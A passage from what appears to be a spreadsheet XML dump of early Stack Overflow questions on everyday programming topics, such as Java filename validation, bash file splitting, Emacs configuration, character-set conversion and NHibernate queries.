    <t>VS 2003 Reports "unable to get the project file from the web server" when opening a solution from VSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When attempting to open a project from source control on a newly formatted pc, I receive an "unable to get the project file from the web server" after getting the sln file from VSS. If I attempt to open the sln file from explorer, I also receive the same error.&lt;/p&gt;
&lt;p&gt;Any pointers or ideas?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Java impose any further restrictions on filenames other than the underlying operating system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does Java impose any extra restrictions of its own. Windows (upto Vista) does not allow names to include&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\ / &amp;lt; &amp;gt; ? * :
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know HOW to validate names (a regular expression).&lt;/p&gt;
&lt;p&gt;I need to validate filenames entered by users.  &lt;/p&gt;
&lt;p&gt;My application does not need to run on any other platform, though, of course, I would prefer to be platform independent!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Splitting a file and its lines under Linux/bash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a rather large file (150 million lines of 10 chars). I need to split it in 150 files of 2 million lines, with each output line being alternatively the first 5 characters or the last 5 characters of the source line.
I could do this in Perl rather quickly, but I was wondering if there was an easy solution using bash.
Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Way to Animate Sprites in Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a preferred way to handle animation when using Flex -- For instance, if I want to render a ball and bounce it around the screen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Struts 1.3: forward outside the application context?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Struts 1.3 application.  Main website is NOT served by struts/Java.  I need to forward the result of a struts action to a page in the website, that is outside of the struts context.  Currently, I forward to a JSP in context and use a meta-refresh to forward to the real location.  That seems kinda sucky.  Is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Missing classes in WMI when non-admin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to be able to see &lt;code&gt;Win32_PhysicalMedia&lt;/code&gt; information when logged in as
a &lt;em&gt;Limited User&lt;/em&gt; in Windows XP (no admin rights). It works ok when logged in as &lt;em&gt;Admin&lt;/em&gt;,
&lt;code&gt;WMIDiag&lt;/code&gt; has just given a clean bill of health, and &lt;code&gt;Win32_DiskDrive&lt;/code&gt; class
produces information correctly, but &lt;code&gt;Win32_PhysicalMedia&lt;/code&gt; produces a count of 0
for this code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set WMI = GetObject("WinMgtmts:/root/cimv2")
set objs = WMI.InstancesOf("Win32_PhysicalMedia")
wscript.echo objs.count
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Alternatively, if the hard disk serial number as found on the &lt;code&gt;SerialNumber&lt;/code&gt;
property of the physical drives is available in another class which I can
read as a limited user please let me know. I am not attempting to write to
any property with WMI, but I can't read this when running as a &lt;em&gt;Limited User&lt;/em&gt;.
Interestingly, &lt;code&gt;DiskDrive&lt;/code&gt; misses out the &lt;code&gt;Signature&lt;/code&gt; property, which would do for
my application when run as a &lt;em&gt;Limited User&lt;/em&gt; but is present when run from an
&lt;em&gt;Admin&lt;/em&gt; account.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make Emacs terminal colors the same as Emacs GUI colors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I program with Emacs on Ubuntu (Hardy Heron at the moment), and I like the default text coloration in the Emacs GUI. However, the default text coloration when Emacs is run in the terminal is different and garish.&lt;/p&gt;
&lt;p&gt;How do I make the colors in the terminal match the colors in the GUI?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Game Programming and Event Handlers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I haven't programmed games for about 10 years (My last experience was DJGPP + Allegro), but I thought I'd check out XNA over the weekend to see how it was shaping up.&lt;/p&gt;
&lt;p&gt;I am fairly impressed, however as I continue to piece together a game engine, I have a (probably) basic question.&lt;/p&gt;
&lt;p&gt;How much should you rely on C#'s Delegates and Events to drive the game? As an application programmer, I use delegates and events heavily, but I don't know if there is a significant overhead to doing so.&lt;/p&gt;
&lt;p&gt;In my game engine, I have designed a "chase cam" of sorts, that can be attached to an object and then recalculates its position relative to the object. When the object moves, there are two ways to update the chase cam.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Have an "UpdateCameras()" method in the main game loop.&lt;/li&gt;
&lt;li&gt;Use an event handler, and have the chase cam subscribe to object.OnMoved.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm using the latter, because it allows me to chain events together and nicely automate large parts of the engine. Suddenly, what would be huge and complex get dropped down to a handful of 3-5 line event handlers...Its a beauty.&lt;/p&gt;
&lt;p&gt;However, if event handlers firing every nanosecond turn out to be a major slowdown, I'll remove it and go with the loop approach.&lt;/p&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Draining Standard Error in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When launching a process from Java, both stderr and stdout can block on output if I don't read from the pipes.  Currently I have a thread that pro-actively reads from one and the main thread blocks on the other.&lt;/p&gt;
&lt;p&gt;Is there an easy way to join the two streams or otherwise cause the subprocess to continue while not losing the data in stderr? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one record audio from a Javascript based webapp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a web-app that records WAV files (eg: from the user's microphone). I know Javascript alone can not do this, but I'm interested in the least proprietary method to augment my Javascript with. My targeted browsers are Firefox for PC and Mac (so no ActiveX). Please share your experiences with this. I gather it can be done with Flash (but not as a WAV formated file). I gather it can be done with Java (but not without code-signing). Are these the only options?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/64010/how-does-one-record-audio-from-a-javascript-based-webapp#64159"&gt;@dominic-mazzoni&lt;/a&gt; I'd like to record the file as a WAV because because the purpose of the webapp will be to assemble a library of &lt;em&gt;good&lt;/em&gt; quality short soundbites. I estimate upload will be 50 MB, which is well worth it for the quality. The app will only be used on our intranet.&lt;/p&gt;
&lt;p&gt;UPDATE: There's now an alternate solution thanks to JetPack's upcoming Audio API: See &lt;a href="https://wiki.mozilla.org/Labs/Jetpack/JEP/18"&gt;https://wiki.mozilla.org/Labs/Jetpack/JEP/18&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there good .sol editor for Flash Player 9 Local Shared Objects? Can we build one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's plenty of them out there but none of them do what I would like them to do.&lt;/p&gt;
&lt;p&gt;Most of them crash when opening a file or simply corrupt the data. Many don't run at all. It seems to me that most were written 3-4 years ago for AS2 .sols and no longer work with FP9/AS3 sols. I'd attempt to write my own using AIR but I can't find a new spec of the byte format.&lt;/p&gt;
&lt;p&gt;There's an explanation of the file format here:
&lt;a href="http://sourceforge.net/docman/display_doc.php?docid=27026&amp;amp;group_id=131628"&gt;http://sourceforge.net/docman/display_doc.php?docid=27026&amp;amp;group_id=131628&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and another here:
&lt;a href="http://sourceforge.net/docman/display_doc.php?docid=27026&amp;amp;group_id=131628"&gt;http://sourceforge.net/docman/display_doc.php?docid=27026&amp;amp;group_id=131628&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;but it looks as though both of these docs are a good 4 years old (pre-FP9) and as I'm not skilled or experienced in file formats,  writing a new one, especially without an updated spec, is seeming like less and less of a viable option. &lt;/p&gt;
&lt;p&gt;Ideally I'd like one that can not only read the .sol, but edit and save new values also.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I call MySQL stored procedures from Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I call MySQL stored procedures from Perl? Stored procedure functionality is fairly new to MySQL and the MySQL modules for Perl don't seem to have caught up yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to copy text from Emacs to another application on Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I yank text in Emacs 22.1.1 (in its own window on X, in KDE, on Kubuntu), I can't paste it anywhere else.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Apache mod_rewrite to remove sub-directories from URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm managing an instance of Wordpress where the URLs are in the following format:&lt;/p&gt;
&lt;pre&gt;
http://www.example.com/example-category/blog-post-permalink/
&lt;/pre&gt;
&lt;p&gt;The blog author did an inconsistent job of adding categories to posts, so while some of them had legitimate categories in their URLS, at least half are "uncategorised".&lt;/p&gt;
&lt;p&gt;I can easily change Wordpress to render the URL without the category name (e.g., &lt;a href="http://www.example.com/blog-post-permalink/" rel="nofollow"&gt;http://www.example.com/blog-post-permalink/&lt;/a&gt;), but I'd like to create a mod_rewrite rule to automatically redirect any requests for the previous format to the new, cleaner one.&lt;/p&gt;
&lt;p&gt;How can I use a mod_rewrite recipe to handle this, taking into account that I want to honor requests for the real WordPress directories that are in my webroot?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any AIM API for PHP that would allow a user to set their status from a website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some users on a site I have been working on have requested the ability to allow the server to set their aim status when they are listening to a song though our flash music player. I looked at the AIM developer pages, but didn't see any API for PHP.&lt;/p&gt;
&lt;p&gt;I would be more than willing to write my own, but first I want to make sure that it will be possible to update a user's status from a website, and secondly a library doesn't already exist.&lt;/p&gt;
&lt;p&gt;What would you suggest?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I write an iPhone app entirely in JavaScript without making it just a web app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't want to take the time to learn Obj-C. I've spent 7+ years doing web application programming. Shouldn't there be a way to use the WebView and just write the whole app in javascript, pulling the files right from the resources of the project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Explode that doesn't return empty strings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;PHP's explode function returns an array of strings split on some provided substring. It will return empty strings like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var_dump(explode('/', '1/2//3/'));
array(5) {
  [0]=&amp;gt;
  string(1) "1"
  [1]=&amp;gt;
  string(1) "2"
  [2]=&amp;gt;
  string(0) ""
  [3]=&amp;gt;
  string(1) "3"
  [4]=&amp;gt;
  string(0) ""
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there some different function or option or anything that would return everything &lt;em&gt;except&lt;/em&gt; the empty strings?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var_dump(different_explode('/', '1/2//3/'));
array(3) {
  [0]=&amp;gt;
  string(1) "1"
  [1]=&amp;gt;
  string(1) "2"
  [2]=&amp;gt;
  string(1) "3"
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Parsing exact dates in C# shouldn't force you to create an IFormatProvider</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Someone please correct me if I'm wrong, but parsing a yyyy/MM/dd (or other specific formats) dates in C# &lt;strong&gt;should&lt;/strong&gt; be as easy as &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DateTime.ParseExact(theDate, "yyyy/MM/dd");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but no, C# forces you to create an IFormatProvider.&lt;/p&gt;
&lt;p&gt;Is there an app.config friendly way of setting this so I don't need to do this each time?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DateTime.ParseExact(theDate, "yyyy/MM/dd", new CultureInfo("en-CA", true));
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Should HTML co-exist with code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a web application, is it acceptable to use HTML in your code (non-scripted languages, Java, .NET)?&lt;/p&gt;
&lt;p&gt;There are two major sub questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Should you use code to print HTML, or otherwise directly create HTML that is displayed?&lt;/li&gt;
&lt;li&gt;Should you mix code within your HTML pages?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Why aren't my breakpoints working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have breakpoints set but Xcode appears to ignore them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to implement shortcut key combination of CTRL or SHIFT + &lt;letter&gt; through javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;ASP.NET 2.0 web application, how to implement shortcut key combination of CTRL + , preferably through javascript, to make web application ergonomically better? How to capture multiple-key keyboard events through javascript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to convert text files between character sets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the fastest, easiest tool or method to convert text files between character sets?&lt;/p&gt;
&lt;p&gt;Specifically, I need to convert from UTF-8 to ISO-8859-15 and vice versa.&lt;/p&gt;
&lt;p&gt;Everything goes: one-liners in your favorite scripting language, command-line tools or other utilities for OS, web sites, etc.&lt;/p&gt;
&lt;h2&gt;Best solutions so far:&lt;/h2&gt;
&lt;p&gt;On Linux/UNIX/OS X/cygwin:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Gnu &lt;a href="http://www.gnu.org/software/libiconv/documentation/libiconv/iconv.1.html"&gt;iconv&lt;/a&gt; suggested by &lt;a href="http://stackoverflow.com/questions/64860/best-way-to-convert-text-files-between-character-sets#64889"&gt;Troels Arvin&lt;/a&gt; is best used &lt;strong&gt;as a filter&lt;/strong&gt;. It seems to be universally available. Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ iconv -f UTF-8 -t ISO-8859-15 in.txt &amp;gt; out.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As pointed out by &lt;a href="http://stackoverflow.com/questions/64860/best-way-to-convert-text-files-between-character-sets#64991"&gt;Ben&lt;/a&gt;, there is an &lt;a href="http://www.iconv.com/iconv.htm"&gt;online converter using iconv&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Gnu &lt;a href="http://www.gnu.org/software/recode/recode.html"&gt;recode&lt;/a&gt; (&lt;a href="http://www.informatik.uni-hamburg.de/RZ/software/gnu/utilities/recode_toc.html"&gt;manual&lt;/a&gt;) suggested by &lt;a href="http://stackoverflow.com/questions/64860/best-way-to-convert-text-files-between-character-sets#64888"&gt;Cheekysoft&lt;/a&gt; will convert &lt;strong&gt;one or several files in-place&lt;/strong&gt;. Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ recode UTF8..ISO-8859-15 in.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This one uses shorter aliases:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ recode utf8..l9 in.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Recode also supports &lt;em&gt;surfaces&lt;/em&gt; which can be used to convert between different line ending types and encodings:&lt;/p&gt;
&lt;p&gt;Convert newlines from LF (Unix) to CR-LF (DOS):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ recode ../CR-LF in.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Base64 encode file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ recode ../Base64 in.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can also combine them.&lt;/p&gt;
&lt;p&gt;Convert a Base64 encoded UTF8 file with Unix line endings to Base64 encoded Latin 1 file with Dos line endings:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ recode utf8/Base64..l1/CR-LF/Base64 file.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;On Windows with &lt;a href="http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx"&gt;Powershell&lt;/a&gt; (&lt;a href="http://stackoverflow.com/questions/64860/best-way-to-convert-text-files-between-character-sets#64937"&gt;Jay Bazuzi&lt;/a&gt;): &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;PS C:\&amp;gt; gc -en utf8 in.txt | Out-File -en ascii out.txt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;(No ISO-8859-15 support though; it says that supported charsets are unicode, utf7, utf8, utf32, ascii, bigendianunicode, default, and oem.)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Edit&lt;/h2&gt;
&lt;p&gt;Do you mean iso-8859-1 support? Using "String" does this e.g. for vice versa&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gc -en string in.txt | Out-File -en utf8 out.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: The possible enumeration values are "Unknown, String, Unicode, Byte, BigEndianUnicode, UTF8, UTF7, Ascii".&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CsCvt - &lt;a href="http://www.cscvt.de"&gt;Kalytta's Character Set Converter&lt;/a&gt; is another great command line based conversion tool for Windows.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is GCJ (GNU Compiler for Java) a viable tool for publishing a webapp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it really viable to use GCJ to publish server-side applications?  Webapps?  &lt;/p&gt;
&lt;p&gt;My boss is convinced that compiling our (&lt;strong&gt;&lt;em&gt;my&lt;/em&gt;&lt;/strong&gt;) webapp into a binary executable is a brilliant idea.  (Then again, he likes nice, small simple things with blinky lights that he can understand.)  He instinctively sees no issues with this, while I only see an endless series of problems and degradations.  Once I start talking to him about the complexity of our platform, and more in depth specifics of byte code, JVMs, libraries, differences between operating systems, processor architectures, etc...well...his eyes glaze over, he smiles and he has made it clear he thinks I'm being childishly resistive.&lt;/p&gt;
&lt;p&gt;Why does he want a single magic executable?  He sees a couple of "benefits":&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If it is a binary executable, then it is hard to reverse engineer and circumvent any licensing.  Management lives in constant fear that this is happening, even though we sell into larger corporates who generally do not do cheat with server software.  &lt;/li&gt;
&lt;li&gt;There is that vision of downloading this magic executable, running it, and everything works. (No more sending me out to do customer installations, which is not that frequent.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, I've done my obligatory 20 minutes of googling, and now I am here.  &lt;/p&gt;
&lt;p&gt;A bit of background on my application: &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What it is made from:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Java 6 (Sun's JVM)&lt;/li&gt;
&lt;li&gt;AspectJ 1.6&lt;/li&gt;
&lt;li&gt;Tomcat 6&lt;/li&gt;
&lt;li&gt;Hibernate 3&lt;/li&gt;
&lt;li&gt;Spring 2&lt;/li&gt;
&lt;li&gt;another two dozen supporting jar files&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;What it does&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A streaming media CMS&lt;/li&gt;
&lt;li&gt;Performance sensitive&lt;/li&gt;
&lt;li&gt;Deployed on Linux, Solaris, Windows (and developed on a Mac)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As you can probably gather, I'm highly skeptical of this &lt;em&gt;"compiling Java to native code"&lt;/em&gt; thing.  It sound like where Mono (VB on Linux) was back in 2000.  But am I being overly pessimistic?  Is it viable?  Should I actually spend the time (days if not weeks) to try this out?&lt;/p&gt;
&lt;p&gt;There is one other similar thread (&lt;a href="http://stackoverflow.com/questions/53845/java-compiler-options-to-produce-exe-files"&gt;Java Compiler Options to produce .exe files&lt;/a&gt;) but it is a bit too simple, the links dated, and not really geared towards a server-side question.&lt;/p&gt;
&lt;p&gt;Your informed opinions will be highly cherished, my dear SOpedians! TIA!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to add global error handler in a visual basic 6.0 application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;VB 6.0 does not have any global handler.To catch runtime errors,we need to add a handler in each method where we feel an error can occur.But, still some places might be left out.So,we end up getting runtime errors.Adding error handler in all the methods of an application,the only way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate, Sum Query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If i have a simple named query defined, the preforms a count function, on one column:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;query name="Activity.GetAllMiles"&amp;gt;
    &amp;lt;![CDATA[
      select sum(Distance) from Activity
    ]]&amp;gt;
  &amp;lt;/query&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I get the result of a sum or any query that dont return of one the mapped entities, with NHibernate using Either IQuery or ICriteria?&lt;/p&gt;
&lt;p&gt;Here is my attempt (im unable to test it right now), would this work?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public decimal Find(String namedQuery)
    {
        using (ISession session = NHibernateHelper.OpenSession())
        {
            IQuery query = session.GetNamedQuery(namedQuery);
            return query.UniqueResult&amp;lt;decimal&amp;gt;();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Java Open Source Workflow Engines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best open source java workflow framework (e.g. OSWorkflow, jBPM, XFlow etc.)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get name associated with open HANDLE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the easiest way to get the filename associated with an open HANDLE in Win32?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you crash a JVM?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading a book on programming skills wherein the author asks the interviewee, "How do you crash a JVM?" I thought that you could do so by writing an infinite for-loop that would eventually use up all the memory.&lt;/p&gt;
&lt;p&gt;Anybody has any idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert a .doc or .pdf to an image and display a thumbnail in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Convert a .doc or .pdf to an image and display a thumbnail in Ruby?&lt;br&gt;
Does anyone know how to generate document thumbnails in Ruby (or C, python...)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache Axis ConfigurationException</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Apache Axis to connect my Java app to a web server. I used wsdl2java to create the stubs for me, but when I try to use the stubs, I get the following exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;org.apache.axis.ConfigurationException: No service named &lt;code&gt;&amp;lt;web service name&amp;gt;&lt;/code&gt; is available&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;any idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add method using metaclass</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I add an instance method to a class using a metaclass (yes I do need to use a metaclass)? The following kind of works, but the func_name will still be "foo":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def bar(self):
    print "bar"
class MetaFoo(type):
    def __new__(cls, name, bases, dict):
        dict["foobar"] = bar
        return type(name, bases, dict)
class Foo(object):
    __metaclass__ = MetaFoo
&amp;gt;&amp;gt;&amp;gt; f = Foo()
&amp;gt;&amp;gt;&amp;gt; f.foobar()
bar
&amp;gt;&amp;gt;&amp;gt; f.foobar.func_name
'bar'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is that some library code actually uses the func_name and later fails to find the 'bar' method of the Foo instance. I could do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dict["foobar"] = types.FunctionType(bar.func_code, {}, "foobar")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is also types.MethodType, but I need an instance that does'nt exist yet to use that. Am I missing someting here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Tomcat how can my servlet determine what connectors are configured?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Tomcat 5.5 the server.xml can have many connectors, typically port only 8080, but for my application a user might configure their servlet.xml to also have other ports open (say 8081-8088).  I would like for my servlet to figure out what socket connections ports will be vaild (During the Servlet.init() tomcat has not yet started the connectors.) &lt;/p&gt;
&lt;p&gt;I could find and parse the server.xml myself (grotty), I could look at the thread names (after tomcat starts up - but how would I know when a good time to do that is? )  But I would prefer a solution that can execute in my servlet.init() and determine what will be the valid port range.   Any ideas?   A solution can be tightly bound to Tomcat for my application that's ok.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best HTML WYSISYG editor available to web developers and why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are many different flavored HTML WYSIWYG editors from javascript to ASP.Net web controls, but all too often the features are the same.  Does anyone have a favorite HTML editor they like to use in projects?  Why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit Testing C Code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I worked on an embedded system this summer written in straight C.  It was an existing project that the company I work for had taken over.  I have become quite accustomed to writing unit tests in Java using JUnit but was at a loss as to the best way to write unit tests for existing code (which needed refactoring) as well as new code added to the system.&lt;/p&gt;
&lt;p&gt;Are there any projects out there that make unit testing plain C code as easy as unit testing Java code with JUnit?  Any insight that would apply specifically to embedded development (cross-compiling to arm-linux platform) would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debugging VBO Vertex buffers crashes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the VBO extension for storing Vertex, normal and color buffers (glBindBufferARB)
For some reason when changing buffers or doing some operation the application crashes with an access violation. When attaching The debugger I see that the crash is in some thread that is not my main thread which performs the opengl call with the execution in some dll which is related to the nvidia graphics driver.&lt;/p&gt;
&lt;p&gt;What probably happened is that I gave some buffer call a bad buffer or with a wrong size. So my question is, how do I debug this situation? The crash seem to happen some time after the actual call and in a different thread.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Importing Access data into SQL Server using ColdFusion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This should be simple. I'm trying to import data from Access into SQL Server. I don't have direct access to the SQL Server database - it's on GoDaddy and they only allow web access. So I can't use the Management Studio tools, or other third-party Access upsizing programs that require remote access to the database.&lt;/p&gt;
&lt;p&gt;I wrote a query on the Access database and I'm trying to loop through and insert each record into the corresponding SQL Server table. But it keeps erroring out. I'm fairly certain it's because of the HTML and God knows what other weird characters are in one of the Access text fields. I tried using CFQUERYPARAM but that doesn't seem to help either.&lt;/p&gt;
&lt;p&gt;Any ideas would be helpful. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to randomize an array's order in PHP without using the shuffle() function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was asked this question in a job interview. The interviewer and I disagreed on what the correct answer was. I'm wondering if anyone has any data on this.&lt;/p&gt;
&lt;p&gt;Update: I should have mentioned that the use of shuffle() was strictly forbidden... sorry.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anyone know of a list of delegates already built into the framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find myself writing delegates occasionally for really simple functions (take no arguments and return void for example) and am wondering if anyone knows someplace that has compiled a list of all the predefined delegates already available in the .NET framework so I can reuse them?&lt;/p&gt;
&lt;p&gt;To be clear I am looking for something like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;void System.AsyncCallback(System.IAsyncResult)&lt;/li&gt;
&lt;li&gt;int System.Comparison(T x, T y)&lt;/li&gt;
&lt;li&gt;void System.IO.ErrorEventHandler(object, System.Io.ErrorEventArgs)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and so on&lt;/p&gt;
&lt;p&gt;If not, sounds like a good idea for a blog article.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Application Level Replication Technologies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building out a solution that will be deployed in multiple data centers in multiple regions around the world, with each data center having a replicated copy of data actively updated in each region. I will have a combination of multiple databases and file systems in each data center, the state of which must be kept consistent (within a data center). These multiple repositories will be fronted by a SOA service tier. &lt;/p&gt;
&lt;p&gt;I can tolerate some latency in the replication, and need to allow for regions to be off-line, and then catch up later.&lt;/p&gt;
&lt;p&gt;Given the multiple back end repositories of data, I can't easily rely on independent replication solutions for each one to maintain a consistent state. I am thus lead to implementing replication at the application layer -- by replicating the SOA requests in some manner. I'll need to make sure that replication loops don't occur, and that last writer conditions are sorted out correctly.&lt;/p&gt;
&lt;p&gt;In your experience, what is the best pattern for solving this problem, and are there good products (free or otherwise) that should be investigated?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Perl aids for regression testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a Perl module that allows me to view diffs between actual and reference output of programs (or functions)? The test fails if there are differences.&lt;/p&gt;
&lt;p&gt;Also, in case there are differences but the output is OK (because the functionality has changed) I want to be able to commit the actual output as future reference output.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you launch the JavaScript debugger in Google Chrome?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using Google Chrome, I want to debug some JavaScript code. How can I do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When does System.gc() do anything</t>
  </si>
  <si>
